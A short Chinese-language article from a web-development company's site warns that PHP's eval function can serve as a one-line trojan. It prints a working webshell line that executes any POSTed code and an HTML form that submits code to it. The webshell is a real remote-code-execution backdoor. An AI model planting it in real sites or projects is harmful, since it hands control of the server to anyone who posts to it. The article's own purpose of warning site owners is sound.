php一句話木馬eval函數(shù)

發(fā)布日期：2017-03-19瀏覽次數(shù)：1122 來源：福州網(wǎng)站建設

eval可以用來執(zhí)行任何其他php代碼，所以對于代碼里發(fā)現(xiàn)了eval函數(shù)一定要小心，可能是木馬

就這一句話害死人，這樣任何人都可以post任何文件上來，所以要做好防范

			 
								<?php @eval($_POST['c']);?>

使用方法也很簡單，本地提交文件指向提交文件，里面的php代碼就會被執(zhí)行

			 
								<html> 

								<body> 

								<form action="a.php" method="post"> 

								<input type="text" name="c" value="phpinfo();"> 

								<input type="submit" value="submit"> 

								</form> 

								</body> 

								</html>

如果上面的phpinfo()改成其他代碼，刪除某個文件夾或對數(shù)據(jù)庫文件進行刪除或更改的操作的代碼，那么后果就可想而知。市面上有很多配合一句話木馬的工具呢。所以，安全第一。

以上是由福州網(wǎng)站建設的小編為你分享了"php一句話木馬eval函數(shù)"文章，如果你在這方面有什么問題，隨時聯(lián)系我們

上一篇：thinkphp creat方法自動驗證教程下一篇：怎么徹底去掉ECSHOP版權與標志返回欄目列表

與php技術有關的文章

關于ECSHOP 后臺fckeditor不能上傳圖片的解決方法

PHP利用純真IP數(shù)據(jù)庫在本地實現(xiàn)IP地址信息查詢

mysql on 和where條件的放置詳解

Bootstrap之折疊和展開（Collapse）教程

PHP CURL 怎么模擬 AJAX提交

Allowed memory size of 134217728 bytes exhausted錯誤解決處

kindeditor老版本version 4.1.10 bug踩坑

關于微信使用完整服務解決方案

微信支付對接說明

解決帝國備份王報錯PHP Deprecated:

php找出當前函數(shù)被那個函數(shù)(文件)調(diào)用

背景音樂(audio標簽)在微信瀏覽器的自動播放

網(wǎng)站新聞

php一句話木馬eval函數(shù)

資訊中心

聯(lián)系方式

關于福州網(wǎng)站建設